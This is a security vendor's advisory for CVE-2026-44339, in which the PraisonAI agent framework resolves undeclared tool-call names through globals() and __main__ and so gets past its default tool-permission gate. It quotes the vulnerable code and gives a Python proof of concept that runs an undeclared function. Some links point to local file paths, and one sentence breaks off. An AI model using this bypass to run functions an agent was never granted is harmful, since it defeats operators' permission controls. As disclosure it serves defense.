CVE-2026-44339

CVE-2026-44339 is a high-severity security vulnerability in praisonaiagents (pip), affecting versions <= 1.6.36. It is fixed in 1.6.37, 4.6.37.

Summary

praisonaiagents resolves unresolved tool names against module globals and __main__ after it fails to match the declared tool list and the registry. With the default agent configuration, _perm_allow is None, so undeclared non-dangerous tool names are not rejected by the permission gate. An attacker who can influence tool-call names can therefore invoke unintended application callables that were never declared as tools.

Details

The vulnerable resolution path is in [tool_execution.py](https://github.com/Users/shmulc/Documents/Codex/2026-05-03/please-go-over-tmp-tp-advisories/repos/PraisonAI/src/praisonai-agents/praisonaiagents/agent/tool_execution.py:734). After searching declared tools and the registry, execution falls back to globals() and then __main__:

func = None
for tool in self.tools if isinstance(self.tools, (list, tuple)) else []:
    ...

if func is None:
    try:
        from ..tools.registry import get_registry
        registry = get_registry()
        func = registry.get(function_name)
    except ImportError:
        pass

if func is None:
    func = globals().get(function_name)
    if not func:
        import __main__
        func = getattr(__main__, function_name, None)

If a callable is found, it is executed directly:

elif callable(func):
    casted_arguments = self._cast_arguments(func, arguments)
    return func(**casted_arguments)

The permission gate does not enforce a declared-tool allowlist by default. In [tool_execution.py](https://github.com/Users/shmulc/Documents/Codex/2026-05-03/please-go-over-tmp-tp-advisories/repos/PraisonAI/src/praisonai-agents/praisonaiagents/agent/tool_execution.py:550), execution is only rejected if _perm_allow is non-None:

if self._perm_deny and function_name in self._perm_deny:
    return {"error": f"Tool '{function_name}' blocked by permission policy", "permission_denied": True}
if self._perm_allow is not None and function_name not in self._perm_allow:
    return {"error": f"Tool '{function_name}' not in allowed tools list", "permission_denied": True}

Default agent initialization sets _perm_allow = None, which means "allow all" rather than "allow only declared tools" in [agent.py](https://github.com/Users/shmulc/Documents/Codex/2026-05-03/please-go-over-tmp-tp-advisories/repos/PraisonAI/src/praisonai-agents/praisonaiagents/agent/agent.py:1749):

self._perm_deny = frozenset()  # Permission tier deny set (empty = no denials)
self._perm_allow = None        # Permission tier allow set (None = allow all)

The project's own tests confirm that default agents have no allowlist and that undeclared custom tool names pass approval:

Empirical verification:

I verified the bypass locally on commit d8a8a786915dc67a7c3021e24f72458f2eac5d9c (v4.6.35) by defining a callable only in __main__, giving the agent an empty tools list, and invoking execute_tool() with that undeclared name. The tool executor ran the __main__ function anyway.

PoC

Environment

  • Repo: MervinPraison/PraisonAI
  • Commit: d8a8a786915dc67a7c3021e24f72458f2eac5d9c
  • Verified against PyPI package versions available on May 3, 2026:
    • praisonaiagents 1.6.35
    • PraisonAI 4.6.35
  • Python 3

Steps

  1. From the repository root, run:
python3 - <<'PY'
import sys
from unittest.mock import MagicMock, patch

sys.path.insert(0, '/Users/shmulc/Documents/Codex/2026-05-03/please-go-over-tmp-tp-advisories/repos/PraisonAI/src/praisonai-agents')
from praisonaiagents.agent.tool_execution import ToolExecutionMixin

def sneaky(msg='ok'):
    return {'ran': msg}

class HookRunner:
    def execute_sync(self, *args, **kwargs):
        return []
    def is_blocked(self, results):
        return False

class Dummy(ToolExecutionMixin):
    def __init__(self):
        self.name = 'demo'
        self.tools = []
        self.chat_history = []
        self._hook_runner = HookRunner()
        self.context_manager = None
        self._doom_loop_tracker = None
        self._perm_deny = frozenset()
        self._perm_allow = None
        self._approval_backend = None

mock_registry = MagicMock()
mock_registry.approve_sync.return_value = MagicMock(approved=True, reason='mock', modified_args=None)
mock_registry.mark_approved = MagicMock()

with patch('praisonaiagents.approval.get_approval_registry', return_value=mock_registry):
    agent = Dummy()
    print(agent.execute_tool('sneaky', {'msg': 'hello'}))
    print(mock_registry.approve_sync.call_args)
PY

Expected output

{'ran': 'hello'}
call('demo', 'sneaky', {'msg': 'hello'})

The important point is that sneaky was never declared in self.tools and was only present in __main__.

Impact

  • Any deployment that lets an untrusted party influence tool-call names: undeclared application callables can run even though they were never registered as tools.
  • Operators who rely on the declared tool list as a security boundary: that boundary is broken because unresolved names fall through to globals() and __main__.
  • Applications that keep privileged helper functions in process scope: the attacker can reuse those helpers with the application's own privileges, which can lead to unauthorized state changes and, depending on what is loaded, data exposure or command execution.

CVE-2026-44339 has a CVSS score of 8.6 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (1.6.37, 4.6.37); upgrading removes the vulnerable code path.

Affected versions

praisonaiagents (<= 1.6.36) PraisonAI (<= 4.6.36)

Security releases

praisonaiagents → 1.6.37 (pip) PraisonAI → 4.6.37 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade the following packages to resolve this vulnerability:

praisonaiagents to 1.6.37 or later; PraisonAI to 4.6.37 or later

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-44339? CVE-2026-44339 is a high-severity security vulnerability in praisonaiagents (pip), affecting versions <= 1.6.36. It is fixed in 1.6.37, 4.6.37.
  2. How severe is CVE-2026-44339? CVE-2026-44339 has a CVSS score of 8.6 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which packages are affected by CVE-2026-44339?
    • praisonaiagents (pip) (versions <= 1.6.36)
    • PraisonAI (pip) (versions <= 4.6.36)
  4. Is there a fix for CVE-2026-44339? Yes. CVE-2026-44339 is fixed in 1.6.37, 4.6.37. Upgrade to this version or later.
  5. Is CVE-2026-44339 exploitable, and should I be worried? Whether CVE-2026-44339 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-44339 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-44339?
    • Upgrade praisonaiagents to 1.6.37 or later
    • Upgrade PraisonAI to 4.6.37 or later

Other vulnerabilities in praisonaiagents

CVE-2026-47392CVE-2026-47395CVE-2026-47390CVE-2026-44339CVE-2026-44335

Stop the waste.
Protect your environment with Kodem.